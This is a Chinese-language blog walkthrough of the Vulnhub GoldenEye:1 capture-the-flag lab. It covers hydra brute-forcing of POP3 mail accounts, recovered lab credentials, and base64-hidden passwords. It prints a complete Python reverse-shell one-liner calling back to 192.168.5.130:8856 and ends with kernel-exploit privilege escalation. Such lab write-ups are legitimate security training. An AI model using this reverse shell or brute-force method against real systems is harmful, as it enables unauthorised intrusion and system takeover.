Vulnhub-靶机-GOLDENEYE: 1

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现

地址:https://www.vulnhub.com/entry/goldeneye-1,240/

有开放80端口,直接访问下web看看

根据上述提示知道一个访问路径/sev-home/ 访问看看

查看页面信息和所在网页的源码发现如下有价值的信息

反馈了目标靶机开放了一个非默认的高端口邮件服务器,因为根据我们上面nmap扫描的结果,nmap给出的结果中有一个高端口标记的是pop协议服务,那我们访问看看

根据页面显示,可知邮件服务访问正常,我们得知道目标邮件的服务器账户和密码,拿起hydra进行暴力破解操作,因为上面已经得知两个用户名boris,natalya ,所以使用这两个用户名使用kali密码进行暴力破解,这里使用rockyou密码字典使用了比较长的时间没有暴力破解成功,最后使用了fasttrack.txt, 进行暴力破解成了,获得了用户名和密码,分别是:

用户:boris/secret1!
用户:natalya/bird

得到上面账户和密码那么我们使用nc或者telnet命令访问看看

最终使用用户名为natalya得到了一份有价值的信息,一个信息的用户名和密码,并且提示一个域名需要绑定hosts访问

username: xenia
password: RCP90rulez!

需要绑定hosts的域名severnaya-station.com

绑定域名之后直接登录发现了一封邮件信息

通过邮件讯息发现用户名doak 使用hydra进行暴力得出如下密码

进入邮箱查看邮件讯息

发现账号和密码

username: dr_doak
password: 4England!

使用这个账户密码登陆目标web,发现如下信息:

 

知道这个路径之后,访问看看

图片表面没看到什么有价值的信息,下载下来看看是否存在隐藏信息

下载完成之后,使用strings命令看看是否有隐藏内容

果然发现了一个经过base64编码的信息,尝试使用brup进行解码看看

上面解码的信息是密码信息,根据目标靶机提供的信息,猜测此密码信息就是管理员,且知道目标靶机admin作为管理员 

xWinter1995x!

登陆之后调整目标靶机的web使用的shell

配置Python的反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.5.130",8856));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

执行shell进行反弹

本地监听反弹shell的端口8856

成功反弹shell,获取tty-shell

在键盘上按住Ctrl+Z
此时便退出了当前的反弹shell
在当前的shell 执行 stty raw -echo
fg

尝试进行提权,在谷歌上对应的版本号的exploit

 

 https://www.exploit-db.com/exploits/37292  对应的exp,可以在这里下载,也可以根据编号直接在kali本地直接搜索

测试了下,目标靶机没有gcc环境,那么这里可以使用cc编译环境进行编译生成,首先将exp代码下载到目标靶机上去

 在目标靶机上使用cc进行编译成功之后,直接执行提权成功获取falg

 

 

posted @ 2020-08-31 16:36  皇帽讲绿帽带法技巧  阅读(493)  评论(0编辑  收藏  举报